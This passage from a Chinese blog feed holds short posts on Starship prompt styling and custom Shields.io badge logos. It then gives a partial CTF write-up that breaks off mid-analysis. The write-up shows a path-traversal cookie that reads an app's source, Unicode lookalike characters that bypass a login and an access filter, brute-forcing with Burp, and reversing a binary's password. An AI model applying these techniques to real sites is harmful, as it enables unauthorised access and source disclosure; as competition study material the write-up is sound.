<p>在终端执行：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">open ~/.config/starship.toml</span><br></pre></td></tr></tbody></table></figure>

<p>将第三行的Apple图标替换为刚刚复制的Linux图标，保存并退出</p>
</li>
<li><p>如果想在此基础上添加用户名的显示：</p>
<p>在终端执行：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">open ~/.config/starship.toml</span><br></pre></td></tr></tbody></table></figure>

<p>在第三行后新建一行：</p>
<figure class="highlight toml"><table><tbody><tr><td class="code"><pre><span class="line">$username\</span><br></pre></td></tr></tbody></table></figure>

<p>在<code>[directory]</code>一行之前添加：</p>
<figure class="highlight toml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="section">[username]</span></span><br><span class="line"><span class="attr">show_always</span> = <span class="literal">true</span></span><br><span class="line"><span class="attr">style_user</span> = <span class="string">"bg:#a3aed2 fg:#090c0c"</span></span><br><span class="line"><span class="attr">style_root</span> = <span class="string">"bg:#a3aed2 fg:#9A348E"</span></span><br><span class="line"><span class="attr">format</span> = <span class="string">'[$user ]($style)'</span></span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure></li>
</ul>
]]></content>
      <categories>
        <category>软件</category>
      </categories>
      <tags>
        <tag>shell</tag>
        <tag>美化</tag>
      </tags>
  </entry>
  <entry>
    <title>Shields.io使用之添加自定义图标</title>
    <url>/posts/shield/</url>
    <content><![CDATA[<h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p><a href="https://shields.io/">Shields.io</a>是一个为我们提供自定义徽章的文章。<span id="more"></span>在GitHub的很多仓库我们都能见到像<img no-lazy="" class="inline" src="https://static.beacox.space/bf-static/media/footer_bowen/volantis.svg" style="height:1.5em">这样的徽章，它们绝大多数都使用<a href="https://shields.io/">Shields.io</a>制作。但是我们在使用logo时，由于其logo库使用<a href="https://simpleicons.org/">Simple Icons</a>，所以只有国际知名的品牌logo能在上面找到。那么，当我们想要使用自己定义的logo时，就不能仅凭<code>logo=xxx</code>这样简单的代码实现了。</p>
<h2 id="官网描述"><a href="#官网描述" class="headerlink" title="官网描述"></a>官网描述</h2><div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e7750ebdd1.png" data-fancybox="one" data-caption="desc"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e7750ebdd1.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e7750ebdd1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="desc"></a><span class="image-caption">desc</span></div></div>
<p>查看官网我们得到这样的信息。发现<a href="https://shields.io/">Shields.io</a>其实是允许我们插入自定义logo图片的，但是要求是高度大于等于14px且http的请求头不能超过8192字节。只要知道文件Base64编码的DataURL形式就可以了。</p>
<h2 id="图片准备"><a href="#图片准备" class="headerlink" title="图片准备"></a>图片准备</h2><h3 id="裁剪压缩图片"><a href="#裁剪压缩图片" class="headerlink" title="裁剪压缩图片"></a>裁剪压缩图片</h3><p>使用png格式图片进行裁剪压缩，我直接用的在线工具：</p>
<div class="tag link"><a class="link-card" title="I❤IMG" href="https://www.iloveimg.com/zh-cn/compress-image"><div class="left"><img src="https://www.iloveimg.com/img/favicons-img/favicon-16x16.png" class="lazyload" data-srcset="https://www.iloveimg.com/img/favicons-img/favicon-16x16.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">I❤IMG</p><p class="url">https://www.iloveimg.com/zh-cn/compress-image</p></div></a></div>

<p>建议将图片裁剪压缩到5k左右，这样能使http请求头尽量小。<del>况且徽章小，图片文件小些没关系</del></p>
<h3 id="获取图片Base64编码的DataURL形式"><a href="#获取图片Base64编码的DataURL形式" class="headerlink" title="获取图片Base64编码的DataURL形式"></a>获取图片Base64编码的DataURL形式</h3><p>推荐大佬做的工具</p>
<div class="tag link"><a class="link-card" title="Base64在线解码编码" href="https://base64.us/"><div class="left"><img src="https://base64.us/favicon.png" class="lazyload" data-srcset="https://base64.us/favicon.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">Base64在线解码编码</p><p class="url">https://base64.us/</p></div></a></div>

<p>如下图，选择你的logo图片（png格式）</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e776001a50.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e776001a50.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e776001a50.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>将这一串字符全选复制。</p>
<h3 id="拼接至URL中"><a href="#拼接至URL中" class="headerlink" title="拼接至URL中"></a>拼接至URL中</h3><p>格式为：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">https://img.shields.io/badge/左边文字-右边文字-右边颜色?logo=data:image/png;base64,刚刚复制的那串字符</span><br></pre></td></tr></tbody></table></figure>



<p>比如我的页脚Copyright徽章，URL为</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">https://img.shields.io/badge/Copyright%402022-Bowen%20Young-%23EF9421?logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAACNUExURUdwTAAAAAEBAL6tmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOzYvwAAAAAAAMi2oAAAAGpiVv/r0QEAAP/u1P+QRUhANhINCfrmzCcaEXluYDIsJfPfxWpgUot+baGSf1tRRZeJeNPAqdzJsbWlkeXRuPGHQKyciE8mDN57OHxBG5NMH2YxEcltMbRgKkFsSfoAAAASdFJOUwDpu/5ZyjAN9Rx5Qv7bmP6qsTzlZxIAAAdRSURBVHja7Vttc6M6D90EEl5CIA9mwbxDgCRNmv7/n/dIBtKkwb01NWTuzNWnne1sLSzpnCPJ++fPf/avMs3QXnq+YW+X61c6YBNCVi/0YL0l6IHxMgdMQvKUEPtVeaAtiZ9YPtHVV0VgQTLPU4KXBcEkwd5z3QiC8LoIuK7bxGTxkkowtiSCC3C944uuQCWkRgdcyMPtK67AJmHDHPByQswXRGBFCuoyB5rwFYWw0UnOLsDFQngBFkARVp0DnhO8IA13bREyo5CGc8dAW5G0jwBLw7ljADgcUTDP81xqZYQstdlzMPB9v4iiqPBDYGV9MzsVf7Hd3DAUnE+nU4h2er9cTzMTAuTg+1+wAzP4w2VmNIQcvPy9t0M4byUCE10fHJj7CgAH3x4deJuXEJbkdHh04O95TkIAKjw/Hn/4OEElajPm4Onj7XYHh+sZsWhGMFLxuCA8nZm9s9NDf0ZpBjgYPOJgnFXWjJxok9ipszTuzM8cC1ipnI0TkYtdoMHEYpYAJyIpV+FcnMh6IiYEmPWywC3mIoSbIn807BDMuXCwGnDAteJ50LBvyp5tJnncN2XPMdgHs6QhyLHjoAOum85yBV1f/vT9XnL0Z1GnAEOJ9+Vs0MZN7jNCUGfIwXjf0IR2MOB5tFHKlGlj8j5DFkAOAhGBJE+jztqz4W/fr4f36a8AcnDAgBsvKJKu018B4ODlcj6jJA/QUJhfPtXB++SywCbhoZPkb2itLr/ZdXJlNKAHH+xEdNs2N5M5sd62PQnP3tqM1HfTsIJhQg2cvzn+AlIpYHJpOYUH6yX+6jP/ePx8f185ZTiJQlS3Xb1/PGfB4Xph6jTMUJ7hCFe+OlEXhKRKij6czh9XVgGsGq4fUJXMtzBrOnQGapbtwAbOz6hHlaKVxIgBJ9aj92DkZ5XbT65K6Q4AB5C8HUrto/iLLA9AGtdVchOIXiJfIAIHpLT79W5S1XlZRoXfzmmOe4veyVPPayL5xGwsQIw/UDCSMJj7II1Rr1t5TMhCNiJDNxDklCOF7g53yhSOJ1v5pKgCDaYO9TzO2ShKlCjuZlZTdAgmeBAUxyrppchnb0KTRsnSoq0HTNBpForqqq22NCoVZ7+voC+r9kqdZ6kf97UYpvne8ada50FT9ll5AANxHAT3osSPjg1eijXROk+zCSmy4isIMBgoorpqMDh9kzRFmwZp6IMgtvZK2evBKMuPilNZrBjdTyRwAvl1iKMh1hG0eefd23NV5BMoIwhA5v7UEl+6OIQM9K0fO4DNumQwhgtQPFfoClTZF5D8/HzXqyVnAW7rBS6AXYFMRtZ2JLZcISulYsH6kY1/EoNK6gCbM5n6zqjUecVtVyyWhtK0OQiyblf8w8PZVjmWN72FpjwTAYF90s6MpE1voQgdAQcyEuEVKPLWeYIpULSgZUl73wGK1BdIAWhL2DAV+iNJUIC7YpEUhLvHWaKnLCQxkkq4w8lBB5qwzVlrKSkG9vBwko9Bfle1/5MUgyWPCHhdQtQmrefoUuoAYWj4S+ua8uQIu7IkJitNSg4OwpDncEIDP+ioI5WSBLwcRLQfxCec3DP1IGmVZXYXyqv3ge1JSCLa6fPddDgIucZJTog9tHBgBTQI5mb9y+evXDVU8HQiLe47J32xXe5MdW3IdgDLnYMEVVT4cQxN622ERMhiu1ONkQ4Mf+g3DkDEaALWNI1zxPa5ayhX9ogpLu7JKEf4pv8gS9omzqVWpbSjE6LvNrK40LNCAZmC85s6xYAsTE0YCIc/VMiB1ocGB1iiAxRjMbwpvJGekA9WhDOsjRQkBrwrBR2Af0XrWLBxvX+9+NWBo7AD2LLEYoNcrgMOT6d4HPuEcKHhATig8Lho8AfUKcucWXab5eR57fTTZGBrUQdqETLE0Axa4JcNA4dM2IHBXMOnlMMOhIRnIY70Rec3a14ZZjypuFeOJUShVj6tLrMWCcMyyQWrgKfIwAFOu8JJwaRmJOkHgm0z7quTb6SnCAY4LU8LzlF5gqQgoSUMQyURHx6Zw+UGuRQnwjBER2xT1MHmHGcwxQgcHPFfEobHEwgD2RgkToWHqJCF4YD6jcRGl79wYHhICN2/6OTu9thG1AGAoqcYYA+ejjmfjphgQgyCJ9BNxSd3vYwRn11Bc1YkT4wzKgLYre3GCOMvWUDTkTUAVTimXdwsSPhAPEAocSPuAFtojZrg2kAid6V4DIi4HANhjs+9xg1wDQhCnPePuHI4P6JCh7O2AAlZHzm0WePa0ldwTU7xfL/irXGH2Dmpjq0c+MVW2bDxEVVR1seWUkM/21Pe1uwmC6BFtBon81uVtliav5keb5b9Oy59yd6TBEWm7HGJS+81CO0M+sEc3xj0DTKcvv7lwEhTl7i91VeqZqj2Su92uEHsp1lZ9hKYvWsAu1+x6itbXcuYWWprVVU37TUa6m6rk+9NX2xXq+V0T6uMDfhjmrvVltnq0XYm+Gpo2gwPTTWjNe3B/vxn/z77P+Q3uRjkDLcpAAAAAElFTkSuQmCC</span><br></pre></td></tr></tbody></table></figure>

<p>效果为：<img no-lazy="" class="inline" src="https://static.beacox.space/bf-static/media/footer_bowen/copyright.svg" style="height:1.5em"></p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><p>上文<code>data:image/png;base64,…</code>这种形式被称为<strong>Data URL Scheme</strong>。</p>
<p><strong>Data URL Scheme</strong>的作用，一般就是将经过Base64编码的数据嵌入网页中，从而减少请求资源的链接数。 上面的<strong>Data URL Scheme</strong>中 base64, 后的字符就是经过base64编码后的数据，浏览器会对其解码并渲染该图片资源。</p>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>shields</tag>
      </tags>
  </entry>
  <entry>
    <title>SJTU CTF 2024 暨 GEEKCTF 2024 WriteUp</title>
    <url>/posts/sjtuctf-2024-wp/</url>
    <content><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>记录一下打CTF以来做出题目最多的一次。这次的题目是 SJTU CTF 2024 校内赛和第一届 GEEKCTF 共用的。所有题目都可以在<a href="https://geekctf.geekcon.top/">GEEKCTF官网</a>找到，由于我是在校内平台做的，flag可能会略有不同，但是解题的方法应该是一样的。</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="Secrets"><a href="#Secrets" class="headerlink" title="Secrets"></a>Secrets</h3><p>本题的漏洞点是任意文件读取+特殊字符绕过upper/lower。</p>
<p>攻击流程如下：</p>
<p>选一个主题后，在登录页面抓包，发现有一个<code>redirectCustomAsset</code>路由</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en,en-US;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: asset=assets/css/pico.cyan.min.css</span><br></pre></td></tr></tbody></table></figure>

<p>看上去是用来读取不同主题的css文件，但是是相对于网站根目录的相对路径。因此猜测可以读取网站目录下的所有文件。</p>
<p>在登陆页面查看网页源代码，发现body后面有一串看不懂的编码，放到cyberchef里一个个试发现是Base85：</p>
<p><a href="https://gchq.github.io/CyberChef/#recipe=From_Base85('!-u',true,'z')&amp;input=L2RnVSZTRG9jYGlmbnM5QDtwMDxFLVZmTVBhcGB0SkR1ZkQrQ1Q%2BNEFUVnUjaWZvJDsrPF1bLlNEb2NgaWZuczlAcmxcdWlmbyQ7KzxdWy5KZmwwWWlmb3RtUF5xYlhKMDhmRkByRXUuRC43J3Mvbz48Py9uOHNEJEtAOyUrPFZmZFBfKCMjK1FBV1VpZm51UVBeamxxQmspJzZAPSEnOkFNLmg2REQjRj9Fc2dva0pmbDBZaWZvJDsrPF1bLlNEb2NgaWZuczlFK3JnIy9uL1g%2BQU0uaDZERCNGP0VzZ29rSmZsMFlpZm8kOys8XVsuU0RvY2BpZm5zOUUrcmcjL245MDhERCNkP0REI0Y/RXNnb2tKZmwwWWlmbyQ7KzxdWy5TRG9jYGlmbnM5RStyZyMvblQ2OUJRSWxyL28%2BPD8vbjhzRCRLQDslKzxWZmRQXygjIytRQVdVaWZudVFQXmpscUJrKSc2QjYlUXBERCNkP0REI0Y/RXNnb2tKZmwwWWlmbyQ7KzxdWy5TRG9jYGlmbnM5RStyZyMvbl0zOUdxTnJKREQjRj9Fc2dva0pmbDBZaWZvJDsrPF1bLlNEb2NgaWZuczlFK3JnIy9ubzM2QmtNPzpELyFsP0BybFx1aWZvJDsrPF1bLkpmbDBZaWZvdG1QXnFiWEowOGZGQHJFdTdAOldxJUQvIWw/QHJsXHVpZm8kOys8XVsuSmZsMFlpZm90bVBecWJYSjA4ZkZAckV1OUJsLkU2RC8hbD9AcmxcdWlmbyQ7KzxdWy5KZmwwWWlmb3RtUF5xYlhKMDhmRkByRXU8RWFgaXVBTS5oNkREI0Y/RXNnb2tKZmwwWWlmbyQ7KzxdWy5TRG9jYGlmbnM5RStyZyMvb1lOQkNHJ0k8REQjRj9Fc2dva0pmbDBZaWZvJDsrPF1bLlNEb2NgaWZuczlFK3JnIy9vWXJNRSwwMCovbz48Py9uOHNEJEtAOyUrPFZmZFBfKCMjK1FBV1VpZm51UVBeamxxQmspJzZFLTYyP0NoNTU5Qmw1UDVGKXFdSlBfKCMjK1FBVzsrPFZmZFBhcGB0SkR1ZkQrRTIlKURfPydBQTFoXzVERCNGP0VzZ29rSmZsMFlpZm8kOys8XVsuU0RvY2BpZm5zOUUrcmcjL290SD1BMWhfNUREI0Y/RXNnb2tKZmwwWWlmbyQ7KzxdWy5TRG9jYGlmbnM5RStyZyMvb3RpO0ZDZChBQmw1UDVGKXFdSlBfKCMjK1FBVzsrPFZmZFBhcGB0SkR1ZkQrRTIlKURfPzNJRGVzISwvbz48Py9uOHNEJEtAOyUrPFZmZFBfKCMjK1FBV1VpZm51UVBeamxxQmspJzZIIkNmLkRnKmdOQmw1UDVGKXFdSlBfKCMjK1FBVzsrPFZmZFBhKDBsSkR1ZkQrRTIlKURfPz9NRElZOzlCbDVQNUYpcV1KUF8oIyMrUUFXTWlmbnVRUF5qbGtFc2dva0pmbDBZKzxWZExpZm90bVBecWJYSjA4Pz9DaT0%2BR0UrcmZ0QVRCRDxFc2dva0pmbDBZKzxWZExpZm90bVBecWJYSjA4TkRELlA%2BN0VzZ29rSmZsMFkrPFZkTGlmb3RtUF5xYlhKMDhUSEZfLFQ9L01mIjwvaG50cUJsNVA8RXNnb2tKZmwwWSs8VmRMaWZvXGVQXnFiWEowOFpIQjUpNjlDMydhQVBhcGB0SkR1ZkQrRDVoN0JrKSglREk2bWxESXRNP0dtYFBxU0RvY2BpZm5zOUUsVF08Q2doRXMvb1ooQ2lmb3RtUF5xYlhKMDhsREVIUHU5QVNsIXJGRTknVkddWDtQUGEoMGxKRHVmRCtFVjEzRSw4cylBVEoyJCs8VmZkUGFwYHRKRHVmRCtDXGMjQU0uWTxELzlQJSs8VmZkUGFwYHRKRHVmRCtER18oQVUjaEBGRFloJCs8VmRMaWZvXGVQXnFiWEowOFpIQjUpNjlCUVMqLQ">解码结果</a></p>
<p>其中比较重要的是app.py和populate.py。</p>
<p>将<code>Cookie</code>改成<code>asset=app.py</code>会回显hacker，改成<code>asset=assets/css/../../app.py</code>即可得到网站的源代码。</p>
<p>在<code>app.py</code>里面硬编码了用户名和密码：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">def isEqual(a, b):</span><br><span class="line">    return a.lower() != b.lower() and a.upper() == b.upper()</span><br><span class="line">……</span><br><span class="line">if isEqual(username, "alice") and isEqual(password, "start2024"):</span><br><span class="line">    session["logged_in"] = True</span><br><span class="line">    session["role"] = "user"</span><br><span class="line">    return redirect("/")</span><br></pre></td></tr></tbody></table></figure>

<p>但是<code>isEqual</code>要求用户名和密码都需要满足小写化后不等于硬编码的用户名/密码，大写化后又要等于。第一眼看懵了，小写不相等但是大写相等？问下claude：</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b492c58255.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b492c58255.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="claude结果"></p>
<p>进一步搜索发现upper对unicode特殊字符的处理有些问题，用<code>unicode</code>包裹起来才会得到正确的大写。不过claude给的字符似乎不对，直接用Python遍历unicode字符好了：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">find_replacement_char</span>(<span class="params">ch</span>):</span><br><span class="line">    <span class="comment"># 遍历 Unicode 字符范围 0x0000 到 0x10FFFF</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x110000</span>):</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            char = <span class="built_in">chr</span>(i)</span><br><span class="line">            <span class="keyword">if</span> char.upper() == ch.upper() <span class="keyword">and</span> char!=ch <span class="keyword">and</span> char!=ch.upper():</span><br><span class="line">                <span class="built_in">print</span>(char)</span><br><span class="line">        <span class="keyword">except</span> ValueError:</span><br><span class="line">            <span class="comment"># 某些 Unicode 码点无法转换为有效字符,跳过</span></span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">find_replacement_char(<span class="string">'i'</span>)</span><br></pre></td></tr></tbody></table></figure>

<p>只找到了<code>i</code>的替代字符<code>ı</code>，<code>s</code>的替代字符<code>ſ</code>。输入用户名<code>alıce</code>，密码<code>ſtart2024</code>，登录成功！</p>
<p>再看看populate.py：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> app <span class="keyword">import</span> Notes, app, db</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> app.app_context():</span><br><span class="line">    db.create_all()</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> Notes.query.filter_by(<span class="built_in">type</span>=<span class="string">"notes"</span>).first():</span><br><span class="line">        db.session.add(Notes(title=<span class="string">"Hello, world!"</span>, message=<span class="string">"This is an example note."</span>))</span><br><span class="line">        db.session.add(</span><br><span class="line">            Notes(</span><br><span class="line">                title=<span class="string">"Where's flag?"</span>,</span><br><span class="line">                message=<span class="string">"Flag is waiting for you inside secrets."</span>,</span><br><span class="line">            )</span><br><span class="line">        )</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> Notes.query.filter_by(<span class="built_in">type</span>=<span class="string">"secrets"</span>).first():</span><br><span class="line">        db.session.add(</span><br><span class="line">            Notes(</span><br><span class="line">                title=<span class="string">"Secret flag"</span>,</span><br><span class="line">                message=os.environ.get(<span class="string">"FLAG"</span>, <span class="string">"fake{flag}"</span>),</span><br><span class="line">                <span class="built_in">type</span>=<span class="string">"secrets"</span>,</span><br><span class="line">            )</span><br><span class="line">        )</span><br><span class="line">    db.session.commit()</span><br></pre></td></tr></tbody></table></figure>

<p>也就是说“type=secrets”会给我们flag，但是在app.py里还有过滤：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">type</span> = request.args.get(<span class="string">"type"</span>, <span class="string">"notes"</span>).strip()</span><br><span class="line"><span class="keyword">if</span> (<span class="string">"secrets"</span> <span class="keyword">in</span> <span class="built_in">type</span>.lower() <span class="keyword">or</span> <span class="string">"SECRETS"</span> <span class="keyword">in</span> <span class="built_in">type</span>.upper()) <span class="keyword">and</span> session.get(</span><br><span class="line">    <span class="string">"role"</span></span><br><span class="line">) != <span class="string">"admin"</span>:</span><br><span class="line">    <span class="keyword">return</span> render_template(</span><br><span class="line">        <span class="string">"index.html"</span>,</span><br><span class="line">        notes=[],</span><br><span class="line">        error=<span class="string">"You are not admin. Only admin can view secre&lt;u&gt;ts&lt;/u&gt;."</span>,</span><br><span class="line">    )</span><br><span class="line">q = db.session.query(Notes)</span><br><span class="line">q = q.<span class="built_in">filter</span>(Notes.<span class="built_in">type</span> == <span class="built_in">type</span>)</span><br><span class="line">notes = q.<span class="built_in">all</span>()</span><br><span class="line"><span class="keyword">return</span> render_template(<span class="string">"index.html"</span>, notes=notes)</span><br></pre></td></tr></tbody></table></figure>

<p>我们需要让and前面的逻辑表达式为否才能够不返回错误、获得flag。</p>
<p>因此要想查看flag，type的参数需要是secrets的变体，页面上给secrets的ts划了下划线，猜测是提示将这两个字符换成特殊字符。</p>
<p>打开Burp的intruder，payload选用simple list，从网上下载了一个特殊字符的列表来爆破<code>ts</code>。</p>
<p>最后ts替换成ƾ时，response的length不一样，点进去看详情就能看到flag。</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49479e6b2.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49479e6b2.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="intruder"></p>
<p>flag: </p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{sTR1Ngs_WitH_tHE_s@mE_we1ghT_aRe_3QUAl_iN_my5q1}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="Memo0"><a href="#Memo0" class="headerlink" title="Memo0"></a>Memo0</h3><p>本题的漏洞点是<del>整数溢出和栈溢出</del>。但是用不到，只需要逆向出密码。</p>
<p>攻击流程如下：</p>
<p>首先要输入密码登录，密码通过一个加密算法后与<code>J8ITC7oaC7ofwTEbACM9zD4mC7oayqY9C7o9Kd==</code>对比，长得很像base64，但是用base64解码出来不对。把<code>sub_12E9</code>的加密函数丢给claude，直接逆出了密码。。。</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">decode</span>(<span class="params">encoded_data</span>):</span><br><span class="line">    <span class="comment"># 计算解码后的数据长度</span></span><br><span class="line">    length = <span class="built_in">len</span>(encoded_data)</span><br><span class="line">    decoded_length = (length * <span class="number">3</span>) // <span class="number">4</span></span><br><span class="line">    <span class="keyword">if</span> encoded_data[-<span class="number">1</span>] == <span class="string">'='</span>:</span><br><span class="line">        decoded_length -= <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> encoded_data[-<span class="number">2</span>] == <span class="string">'='</span>:</span><br><span class="line">        decoded_length -= <span class="number">1</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 创建解码后的数据缓冲区</span></span><br><span class="line">    decoded = <span class="built_in">bytearray</span>(decoded_length)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 标准 Base64 字符映射表</span></span><br><span class="line">    base64_chars = <span class="string">"ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 遍历编码数据并解码</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, length, <span class="number">4</span>):</span><br><span class="line">        value = <span class="number">0</span></span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">            <span class="keyword">if</span> i + j &lt; length:</span><br><span class="line">                char = encoded_data[i + j]</span><br><span class="line">                <span class="keyword">if</span> char == <span class="string">'='</span>:</span><br><span class="line">                    value &lt;&lt;= <span class="number">6</span> * (<span class="number">3</span> - j)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    value |= base64_chars.index(char) &lt;&lt; <span class="number">6</span> * (<span class="number">3</span> - j)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 将 24 位值拆分成 3 个字节并写入解码后的数据</span></span><br><span class="line">        decoded_pos = i // <span class="number">4</span> * <span class="number">3</span></span><br><span class="line">        decoded[decoded_pos] = (value &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span></span><br><span class="line">        <span class="keyword">if</span> decoded_pos + <span class="number">1</span> &lt; decoded_length:</span><br><span class="line">            decoded[decoded_pos + <span class="number">1</span>] = (value &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span></span><br><span class="line">        <span class="keyword">if</span> decoded_pos + <span class="number">2</span> &lt; decoded_length:</span><br><span class="line">            decoded[decoded_pos + <span class="number">2</span>] = value &amp; <span class="number">0xFF</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> decoded.decode(<span class="string">'latin-1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(decode(<span class="string">'J8ITC7oaC7ofwTEbACM9zD4mC7oayqY9C7o9Kd=='</span>))</span><br><span class="line"><span class="comment"># CTF_is_interesting_isn0t_itÀ</span></span><br></pre></td></tr></tbody></table></figure>

<p>但是好像有点问题，将<code>À</code>改成<code>?</code>就对了。</p>
<p>一开始没有在本地新建<code>flag</code>文件，ida里面还把<code>win</code>函数看漏了。。。导致还在继续用栈溢出去劫持control flow调用<code>win</code>，其实逆向出密码就可以得到flag。</p>
<p>完整exp：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">nc <span class="number">111.186</span><span class="number">.57</span><span class="number">.85</span> <span class="number">40310</span></span><br><span class="line">===================Memo Login===================</span><br><span class="line">Please enter your password: CTF_is_interesting_isn0t_it?</span><br><span class="line">Login Success!</span><br><span class="line">0ops{U_r_th3_ma5ter_0f_ba5e64}</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{U_r_th3_ma5ter_0f_ba5e64}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="Memo1"><a href="#Memo1" class="headerlink" title="Memo1"></a>Memo1</h3><p>本题的漏洞点是整数溢出和栈溢出。</p>
<p>攻击流程如下：</p>
<p>首先checksec：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      PIE enabled</span><br><span class="line">RUNPATH:  b'.'</span><br></pre></td></tr></tbody></table></figure>

<p>保护全开。然后看main函数，发现供用户输入的字符串在栈上，大小是264字节，乍一看用户也只能输入0x100即256字节，很安全。但是在实现<code>edit</code>功能的函数里面：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">lea     rax, aLld       ; "%lld"</span><br><span class="line">mov     rdi, rax</span><br><span class="line">mov     eax, 0</span><br><span class="line">call    ___isoc99_scanf</span><br><span class="line">mov     edx, [rbp+var_1C]</span><br><span class="line">mov     rax, [rbp+var_10]</span><br><span class="line">cmp     rdx, rax</span><br><span class="line">jle     short loc_1873</span><br><span class="line">mov     rax, [rbp+var_10]</span><br><span class="line">mov     edx, eax</span><br><span class="line">mov     rax, [rbp+var_18]</span><br><span class="line">mov     esi, edx</span><br><span class="line">mov     rdi, rax</span><br><span class="line">call    sub_170E</span><br></pre></td></tr></tbody></table></figure>

<p>可以发现，允许用户输入的是有符号数，而比较的时候却是根据无符号数进行比较，然后在读取用户输入的时候又使用其低32位作为允许输入的长度，因此会出现类似<code>0xffffffff00000109 &lt; 0x8</code>的情况，却允许用户输入<code>0x109</code>个字节。</p>
<p>为了能够输入我们想要的长度，需要将<code>0xffffffff00000109</code>这样的数转换成相应的负数：</p>
